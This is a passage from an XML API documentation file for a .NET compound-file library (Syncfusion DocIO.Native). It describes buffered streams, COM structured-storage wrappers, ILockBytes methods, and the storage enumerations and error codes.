            Write one byte of information into stream.
            </summary>
            <param name="value">Value which must be written.</param>
            <exception cref="T:System.ArgumentNullException">
            If stream is NULL.
            </exception>
            <exception cref="T:System.ArgumentException">
            If can't write into stream.
            </exception>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.BufferedStreamEx.Seek(System.Int64,System.IO.SeekOrigin)">
            <summary>
            On any Seek operation, data not written from cache will be
            flushed to the wrapped stream. Using the Position property is better as
            it is optimized for cache use.
            </summary>
            <param name="offset">New offset of stream.</param>
            <param name="origin">Start point of seek operation.</param>
            <returns>Current position.</returns>
            <exception cref="T:System.ArgumentNullException">
            If stream is NULL.
            </exception>
            <exception cref="T:System.ArgumentException">
            If can't seek in the stream.
            </exception>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.BufferedStreamEx.Close">
            <summary>
            Saves all the data from cache and closes the stream.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.BufferedStreamEx.Flush">
            <summary>
            Flushes data and resets the cache.
            </summary>
            <exception cref="T:System.ArgumentNullException">
            When stream is NULL.
            </exception>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.BufferedStreamEx.FlushRead">
            <summary>
            The file is read in blocks, but a user could read 1 byte
            from the buffer and write it. At that point, the Operating System's file
            pointer is out of sync with the stream's position. Hence, all write
            functions should call this function to preserve the position in the file.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.BufferedStreamEx.FlushWrite">
            <summary>
            Since Write is buffered, any time the buffer fills up
            or the buffer switches to reading and there is dirty data 
            (_writePos > 0), this function must be called.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.BufferedStreamEx.SetLength(System.Int64)">
            <summary>
            Sets length of wrapped stream.
            </summary>
            <param name="value">New length of stream.</param>
            <exception cref="T:System.ArgumentOutOfRangeException">
            When value is less than zero.
            </exception>
            <exception cref="T:System.ArgumentNullException">
            When stream is NULL.
            </exception>
            <exception cref="T:System.ArgumentException">
            Cannot seek or cannot write into stream.
            </exception>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.BufferedStreamEx.CanRead">
            <summary>
            Indicates whether data can be read from the wrapped stream.
            True if data can be read.
            </summary>
            <exception cref="T:System.ArgumentNullException">Class instance was disposed.</exception>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.BufferedStreamEx.CanWrite">
            <summary>
            Indicates whether data can be written to wrapped stream.
            </summary>
            <exception cref="T:System.ArgumentNullException">Class instance was disposed.</exception>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.BufferedStreamEx.CanSeek">
            <summary>
            Indicates whether the wrapped stream supports Seek operations.
            </summary>
            <exception cref="T:System.ArgumentNullException">Class instance was disposed.</exception>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.BufferedStreamEx.Length">
            <summary>
            Gets length of the wrapped stream. When this property is accessed, the data 
            that is not written to the stream is first flushed.
            </summary>
            <exception cref="T:System.ArgumentNullException">Class instance was disposed.</exception>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.BufferedStreamEx.Position">
            <summary>
            Gets the current position of stream. Position can be different from the value in wrapped
            stream, because wrapped stream will point to the last byte of the
            cached data. When this property is set, the data that is not written is flushed to the stream.
            </summary>
            <exception cref="T:System.ArgumentNullException">Class instance was disposed.</exception>
            <exception cref="T:System.ArgumentException">Wrapped stream does not support seek operation.</exception>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.BufferedStreamEx.BaseStream">
            <summary>
            Get reference of stream wrapped by BufferStreamEx.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.CompoundFile">
            <summary>
            This is compound file implementation based on standard COM-objects.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CompoundFile.m_rootStorage">
            <summary>
            Root storage.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CompoundFile.m_lockBytes">
            <summary>
            Represents the locking bytes.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.CompoundFile.#ctor">
            <summary>
            Default constructor. Creates native compound file in memory.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.CompoundFile.#ctor(System.IO.Stream)">
            <summary>
            Creates new instance of the compound file based on the specified stream.
            </summary>
            <param name="stream">Stream to extract data from.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.CompoundFile.#ctor(System.String,Syncfusion.CompoundFile.DocIO.Native.STGM)">
            <summary>
            Creates new instance of the compound file based on the file name and open flags.
            </summary>
            <param name="fileName">Name of the file to parse.</param>
            <param name="options">Storage options.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.CompoundFile.Flush">
            <summary>
            Flushes all internal buffers.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.CompoundFile.CreateStorageOnILockBytes">
            <summary>
            Cretes storage on ILockBytes.
            </summary>
            <returns>Created storage.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.CompoundFile.SaveILockBytesIntoStream(System.IO.Stream)">
            <summary>
            Saves internal ILockBytes into stream.
            </summary>
            <param name="stream">Stream to save into.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.CompoundFile.Open(System.IO.Stream)">
            <summary>
            Opens specified stream.
            </summary>
            <param name="stream">Stream to open.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.CompoundFile.Save(System.IO.Stream)">
            <summary>
            Saves compound file into stream
            </summary>
            <param name="stream">Stream to save data into.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.CompoundFile.Save(System.String)">
            <summary>
            Saves compound file into file.
            </summary>
            <param name="fileName">Name of the file to save into.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.CompoundFile.Dispose">
            <summary>
            Frees all allocated resources.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.CompoundFile.Directory">
            <summary>
            Gets the directory
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.CompoundFile.RootStorage">
            <summary>
            Returns root storage object for this file.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.ILockBytes">
            <summary>
            Summary description for ILockBytes.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.ILockBytes.ReadAt(System.UInt64,System.Byte[],System.UInt32,System.UInt32@)">
            <summary>
            The ReadAt method reads a specified number of bytes 
            starting at a specified offset from the beginning of the byte array object.
            </summary>
            <param name="ulOffset">Specifies the starting point from the beginning 
            of the byte array for reading data.</param>
            <param name="pv">Pointer to the buffer into which the byte array is read. 
            The size of this buffer is contained in cb.</param>
            <param name="cb">Specifies the number of bytes of data to attempt to read
             from the byte array. </param>
            <param name="pcbRead">Pointer to a ULONG where this method writes the actual
             number of bytes read from the byte array. You can set this pointer to NULL
             to indicate that you are not interested in this value. In this case, this
             method does not provide the actual number of bytes that were read.</param>
            <returns>S_OK - Indicates that the specified number of bytes were read, or the
             maximum number of bytes were read to the end of the byte array.
             E_FAIL - Data could not be read from the byte array. 
             E_PENDING - Asynchronous Storage only: Part or all of the data to be
             read is currently unavailable.
             STG_E_ACCESSDENIED - The caller does not have permission to access the byte array.
             STG_E_READFAULT - The number of bytes to be read does not equal the number of bytes
              that were actually read</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.ILockBytes.WriteAt(System.UInt64,System.Byte[],System.UInt32,System.UInt32@)">
            <summary>
            The WriteAt method writes the specified number of bytes starting at a specified offset
             from the beginning of the byte array.
            </summary>
            <param name="ulOffset">Specifies the starting point from 
            the beginning of the byte array for the data to be written.</param>
            <param name="pv">Pointer to the buffer containing the data to be written.</param>
            <param name="cb">Specifies the number of bytes of data to attempt to write into 
            the byte array. </param>
            <param name="pcbWritten">Pointer to a location where this method specifies the 
            actual number of bytes written to the byte array. You can set this pointer to 
            NULL to indicate that you are not interested in this value. In this case, this
             method does not provide the actual number of bytes written.</param>
            <returns>S_OK - Indicates that the specified number of bytes were written.
            E_FAIL - A general failure occurred during the write operation.
            E_PENDING - Asynchronous Storage only: Part or all of the data to be 
            written is currently unavailable.
            STG_E_ACCESSDENIED - The caller does not have enough permissions for writing 
            this byte array.
            STG_E_WRITEFAULT - The number of bytes to be written does not equal the number
             of bytes that were actually written.
             STG_E_MEDIUMFULL - The write operation was not completed because there is no 
             space left on the storage device. The actual number of bytes written is still
              returned in pcbWritten. </returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.ILockBytes.Flush">
            <summary>
            The Flush method ensures that any internal buffers maintained by the ILockBytes
             implementation are written out to the underlying physical storage.
            </summary>
            <returns>S_OK - The flush operation was successful.
            STG_E_ACCESSDENIED - The caller does not have permission to access the byte array. 
            STG_E_MEDIUMFULL - The flush operation is not completed because there is no space
            left on the storage device.
            E_FAIL - General failure writing data.
            STG_E_TOOMANYFILESOPEN - Under certain circumstances, the Flush method executes 
            a download-and-closeto flush, which can lead to a return value of 
            STG_E_TOOMANYFILESOPEN if no file handles are available. 
            STG_E_INVALIDHANDLE - An underlying file has been prematurely closed, or the 
            correct floppy disk has been replaced by an invalid one.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.ILockBytes.SetSize(System.UInt64)">
            <summary>
            The SetSize method changes the size of the byte array.
            </summary>
            <param name="cb">Specifies the new size of the byte array as a number of bytes.</param>
            <returns>S_OK - The size of the byte array was successfully changed.
            STG_E_ACCESSDENIED - The caller does not have permission to access the byte array.
            STG_E_MEDIUMFULL - The byte array size is not changed because there is no
             space left on the storage device.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.ILockBytes.LockRegion(System.UInt64,System.UInt64,System.UInt32)">
            <summary>
            The LockRegion method restricts access to a specified range of bytes in the byte array.
            </summary>
            <param name="libOffset">Specifies the byte offset for the beginning of the range.</param>
            <param name="cb">Specifies, in bytes, the length of the range to be restricted.</param>
            <param name="dwLockType">Specifies the type of restrictions being requested on 
            accessing the range. This parameter uses one of the values from the LOCKTYPE enumeration.</param>
            <returns>S_OK - The specified range of bytes was locked
            STG_E_INVALIDFUNCTION - Locking is not supported at all or the specific type of lock 
            requested is not supported.
            STG_E_ACCESSDENIED - Access denied because the caller has insufficient permission, 
            or another caller has the file open and locked.
            STG_E_LOCKVIOLATION - Access denied because another caller has the file open and locked.
            STG_E_INVALIDHANDLE - An underlying file has been prematurely closed, or the
            correct floppy disk has been replaced by an invalid one</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.ILockBytes.UnlockRegion(System.UInt64,System.UInt64,System.UInt32)">
            <summary>
            The UnlockRegion method removes the access restriction on a previously 
            locked range of bytes.
            </summary>
            <param name="libOffset">Specifies the byte offset for the beginning of the range. </param>
            <param name="cb">Specifies, in bytes, the length of the range that is restricted.</param>
            <param name="dwLockType">Specifies the type of access restrictions previously 
            placed on the range. This parameter uses a value from the LOCKTYPE enumeration. </param>
            <returns>S_OK - The byte range was unlocked.
            STG_E_INVALIDFUNCTION  - Locking is not supported at all or the specific type
            of lock requested is not supported.
            STG_E_LOCKVIOLATION The requested unlock cannot be granted.
             </returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.ILockBytes.Stat(Syncfusion.CompoundFile.DocIO.Native.STATSTG@,System.UInt32)">
            <summary>
            The Stat method retrieves a STATSTG structure containing information for
             this byte array object.
            </summary>
            <param name="pstatstg">Pointer to a STATSTG structure in which this method
             places information about this byte array object. The pointer is NULL if 
             an error occurs.</param>
            <param name="grfStatFlag">Specifies whether this method should supply the
             pwcsName member of the STATSTG structure through values taken from the
             STATFLAG enumeration. If the STATFLAG_NONAME is specified, the pwcsName 
             member of STATSTG is not supplied, thus saving a memory-allocation operation. 
             The other possible value, STATFLAG_DEFAULT, indicates that all members of the 
             STATSTG structure be supplied.</param>
            <returns>S_OK - The STATSTG structure was successfully returned at 
            the specified location.
            E_OUTOFMEMORY - The STATSTG structure was not returned due to a lack of memory 
            for the name member in the structure. 
            STG_E_ACCESSDENIED - The STATSTG structure was not returned because the caller
            did not have access to the byte array.
            STG_E_INSUFFICIENTMEMORY - The STATSTG structure was not returned, due to 
            insufficient memory. 
            STG_E_INVALIDFLAG - The value for the grfStateFlag parameter is not valid.
            STG_E_INVALIDPOINTER - The value for the pStatStg parameter is not valid. 
            </returns>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.NativeStream">
            <summary>
            Implementation of compound stream based on standard COM object.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.NativeStream.m_stream">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.NativeStream.m_lPosition">
            <summary>
            Stream position.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.NativeStream.#ctor(Syncfusion.CompoundFile.DocIO.Native.IStream,System.String)">
            <summary>
            Initializes new instance of the stream object.
            </summary>
            <param name="stream">COM stream to use.</param>
            <param name="name">Name of the stream.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.NativeStream.Read(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Reads a sequence of bytes from the current stream and advances the position
            within the stream by the number of bytes read.
            </summary>
            <param name="buffer">An array of bytes. When this method returns, the buffer contains
            the specified byte array with the values between offset and (offset + count - 1)
            replaced by the bytes read from the current source.</param>
            <param name="offset">The zero-based byte offset in buffer at which to begin storing
            the data read from the current stream.</param>
            <param name="length">The maximum number of bytes to be read from the current stream.</param>
            <returns>The total number of bytes read into the buffer. This can be less
            than the number of bytes requested if that many bytes are not currently
            available, or zero (0) if the end of the stream has been reached.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.NativeStream.Write(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Writes a sequence of bytes to the current stream and advances the current position
            within this stream by the number of bytes written.
            </summary>
            <param name="buffer">An array of bytes. This method copies length bytes from buffer to the current stream.</param>
            <param name="offset">The zero-based byte offset in buffer at which to begin copying bytes to the current stream.</param>
            <param name="length">The number of bytes to be written to the current stream.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.NativeStream.Seek(System.Int64,System.IO.SeekOrigin)">
            <summary>
            Sets the position within the current stream. 
            </summary>
            <param name="position">A byte offset relative to the origin parameter.</param>
            <param name="origin">A value of type SeekOrigin indicating the reference point used to obtain the new position.</param>
            <returns>The new position within the current stream.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.NativeStream.SetLength(System.Int64)">
            <summary>
            Sets the length of the current stream.
            </summary>
            <param name="length">The desired length of the current stream in bytes.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.NativeStream.Flush">
            <summary>
            Clears all buffers for this stream and causes any buffered data to be
            written to the underlying device.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.NativeStream.Dispose(System.Boolean)">
            <summary>
            Releases the unmanaged resources used by the Stream and optionally releases the managed resources.
            </summary>
            <param name="disposing">true to release both managed and unmanaged resources;
            false to release only unmanaged resources.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.NativeStream.CheckBufferOffsetLength(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Checks whether offset and length can be fit inside specified buffer.
            </summary>
            <param name="buffer">Buffer to check.</param>
            <param name="offset">Offset to check.</param>
            <param name="length">Length to check.</param>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.NativeStream.Length">
            <summary>
            Gets the length in bytes of the stream.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.NativeStream.Position">
            <summary>
            Gets or sets the position within the current stream.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.NativeStream.CanRead">
            <summary>
            Gets a value indicating whether the current stream supports reading.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.NativeStream.CanWrite">
            <summary>
            Gets a value indicating whether the current stream supports writing.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.NativeStream.CanSeek">
            <summary>
            Gets a value indicating whether the current stream supports seeking.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.STGTY">
            <summary>
            The STGTY enumeration values are used in the type member of the STATSTG
            structure to indicate the type of the storage element.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STGTY.STGTY_STORAGE">
            <summary>
            Indicates that the storage element is a storage object.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STGTY.STGTY_STREAM">
            <summary>
            Indicates that the storage element is a stream object.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STGTY.STGTY_LOCKBYTES">
            <summary>
            Indicates that the storage element is a byte-array object.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STGTY.STGTY_PROPERTY">
            <summary>
            Indicates that the storage element is a property storage object.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.STREAM_SEEK">
            <summary>
            The STREAM_SEEK enumeration values specify the origin from which to
            calculate the new seek-pointer location.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STREAM_SEEK.STREAM_SEEK_SET">
            <summary>
            The new seek pointer is an offset relative to the beginning of
            the stream. In this case, the dlibMove parameter is the new seek
            position relative to the beginning of the stream.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STREAM_SEEK.STREAM_SEEK_CUR">
            <summary>
            The new seek pointer is an offset relative to the current seek
            pointer location. In this case, the dlibMove parameter is the
            signed displacement from the current seek position.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STREAM_SEEK.STREAM_SEEK_END">
            <summary>
            The new seek pointer is an offset relative to the end of the stream.
            In this case, the dlibMove parameter is the new seek position
            relative to the end of the stream.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.LOCKTYPE">
            <summary>
            The LOCKTYPE enumeration values indicate the type of locking requested
            for the specified range of bytes.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.LOCKTYPE.LOCK_WRITE">
            <summary>
            If this lock is granted, the specified range of bytes can be opened
            and read any number of times, but writing to the locked range is
            prohibited except for the owner who granted this lock.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.LOCKTYPE.LOCK_EXCLUSIVE">
            <summary>
            If this lock is granted, writing to the specified range of bytes is
            prohibited except by the owner granted this lock.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.LOCKTYPE.LOCK_ONLYONCE">
            <summary>
            If this lock is granted, no other LOCK_ONLYONCE lock can be obtained
            on the range. Usually this lock type is an alias for some other lock
            type. Thus, specific implementations can have additional behavior
            associated with this lock type.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.STGM">
            <summary>
            The STGM enumeration values are used in the IStorage, IStream, and
            IPropertySetStorage interfaces. These elements are often combined
            using an OR operator.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STGM.STGM_READ">
            <summary>
            Indicates that the object is read-only, meaning that modifications
            cannot be made.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STGM.STGM_WRITE">
            <summary>
            STGM_WRITE lets you save changes to the object, but does not permit
            access to its data.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STGM.STGM_READWRITE">
            <summary>
            STGM_READWRITE allows you to both access and modify an object's data.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STGM.STGM_SHARE_DENY_NONE">
            <summary>
            Specifies that subsequent openings of the object are not denied read
            or write access. If no flag from the sharing group is specified,
            this flag is assumed.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STGM.STGM_SHARE_DENY_READ">
            <summary>
            Prevents others from subsequently opening the object in STGM_READ mode.
            It is typically used on a root storage object.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STGM.STGM_SHARE_DENY_WRITE">
            <summary>
            Prevents others from subsequently opening the object for STGM_WRITE
            or STGM_READWRITE access.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STGM.STGM_SHARE_EXCLUSIVE">
            <summary>
            Prevents others from subsequently opening the object in any mode. In
            transacted mode, sharing of STGM_SHARE_DENY_WRITE or STGM_SHARE_EXCLUSIVE
            can significantly improve performance since they don't require snapshotting.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STGM.STGM_PRIORITY">
            <summary>
            Opens the storage object with exclusive access to the most recently
            committed version.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STGM.STGM_CREATE">
            <summary>
            Indicates that an existing storage object or stream should be removed
            before the new one replaces it.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STGM.STGM_CONVERT">
            <summary>
            Creates the new object while preserving existing data in a stream
            named "Contents".
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STGM.STGM_FAILIFTHERE">
            <summary>
            Causes the create operation to fail if an existing object with the
            specified name exists.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STGM.STGM_DIRECT">
            <summary>
            In direct mode, each change to a storage or stream element is
            written as it occurs.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STGM.STGM_TRANSACTED">
            <summary>
            In transacted mode, changes are buffered and written only if an
            explicit commit operation is called.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STGM.STGM_NOSCRATCH">
            <summary>
            In transacted mode, a temporary scratch file is usually used to
            save modifications until the Commit method is called.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STGM.STGM_NOSNAPSHOT">
            <summary>
            This flag is used when opening a storage object with STGM_TRANSACTED
            and without STGM_SHARE_EXCLUSIVE or STGM_SHARE_DENY_WRITE.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STGM.STGM_SIMPLE">
            <summary>
            STGM_SIMPLE is a mode that provides a much faster implementation of
            a compound file in a limited, but frequently used case.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STGM.STGM_DIRECT_SWMR">
            <summary>
            The STGM_DIRECT_SWMR supports direct mode for single-writer,
            multireader file operations.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STGM.STGM_DELETEONRELEASE">
            <summary>
            Indicates that the underlying file is to be automatically destroyed
            when the root storage object is released.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.STGFMT">
            <summary>
            The STGFMT enumeration values specify the format of a storage object
            and are used in the StgCreateStorageEx and StgOpenStorageEx functions
            in the STGFMT parameter.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STGFMT.STGFMT_STORAGE">
            <summary>
            Indicates that the file must be a compound file.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STGFMT.STGFMT_FILE">
            <summary>
            Indicates that the file must not be a compound file.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STGFMT.STGFMT_ANY">
            <summary>
            Indicates that the system will determine the file type and use the
            appropriate structured storage or property set implementation.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STGFMT.STGFMT_DOCFILE">
            <summary>
            Indicates that the file must be a compound file and is similar to
            the STGFMT_STORAGE flag, but indicates that the compound-file form
            of the compound-file implementation must be used.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.STG_ERRORS">
            <summary>
            Error code which StgOpenStorage method can return after execution.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STG_ERRORS.S_OK">
            <summary>
            Success code.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STG_ERRORS.S_FAIL">
            <summary>
            Filed.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STG_ERRORS.STG_E_ACCESSDENIED">
            <summary>
            Access Denied.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STG_ERRORS.STG_E_FILEALREADYEXISTS">
            <summary>
            File already exists.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STG_ERRORS.STG_E_FILENOTFOUND">
            <summary>
            File could not be found.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STG_ERRORS.STG_E_INSUFFICIENTMEMORY">
            <summary>
            There is insufficient memory available to complete operation.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STG_ERRORS.STG_E_INVALIDFLAG">
            <summary>
             Invalid flag error.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STG_ERRORS.STG_E_INVALIDFUNCTION">
            <summary>
            Unable to perform requested operation.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STG_ERRORS.STG_E_INVALIDHANDLE">
            <summary>
            Attempted an operation on an invalid object.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STG_ERRORS.STG_E_INVALIDNAME">
            <summary>
            The name is not valid.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STG_ERRORS.STG_E_INVALIDPOINTER">
            <summary>
            Invalid pointer error.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STG_ERRORS.STG_E_LOCKVIOLATION">
            <summary>
            A lock violation has occurred.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STG_ERRORS.STG_E_NOTSIMPLEFORMAT">
            <summary>
            The compound file was not created with the STGM_SIMPLE flag.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STG_ERRORS.STG_E_OLDDLL">
            <summary>
            The compound file was produced with a newer version of storage.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STG_ERRORS.STG_E_OLDFORMAT">
            <summary>
             The compound file was produced with an incompatible version of storage.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STG_ERRORS.STG_E_PATHNOTFOUND">
            <summary>
            The path could not be found.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STG_ERRORS.STG_E_SHAREVIOLATION">
            <summary>
            A share violation has occurred.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STG_ERRORS.STG_E_TOOMANYOPENFILES">
            <summary>
            There are insufficient resources to open another file.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.STGC">
            <summary>
            The STGC enumeration constants specify the conditions for performing
            the commit operation in the IStorage::Commit and IStream::Commit methods.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STGC.STGC_DEFAULT">
            <summary>
            You can specify this condition with STGC_CONSOLIDATE or some
            combination of the other three flags in this list of elements.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STGC.STGC_OVERWRITE">
            <summary>
            The commit operation can overwrite existing data to reduce overall
            space requirements.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STGC.STGC_ONLYIFCURRENT">
            <summary>
            Prevents multiple users of a storage object from overwriting each
            other's changes.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STGC.STGC_DANGEROUSLYCOMMITMERELYTODISKCACHE">
            <summary>
            Commits the changes to a write-behind disk cache, but does not save
            the cache to the disk.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STGC.STGC_CONSOLIDATE">
            <summary>
            Microsoft Windows 2000/XP: Indicates that a storage should be
            consolidated after it is committed, resulting in a smaller file on disk.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.PIDSI">
            <summary>
            Property IDs for the SummaryInformation Property Set.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PIDSI.Title">
            <summary>
            Title Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PIDSI.Subject">
            <summary>
            Subject Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PIDSI.Author">
            <summary>
            Author Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PIDSI.Keywords">
            <summary>
            Keywords Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PIDSI.Comments">
            <summary>
            Comments Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PIDSI.Template">
            <summary>
            Template Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PIDSI.LastAuthor">
            <summary>
            LastAuthor Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PIDSI.Revnumber">
            <summary>
            Revnumber Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PIDSI.EditTime">
            <summary>
            EditTime Id.
            </summary>
        </member>
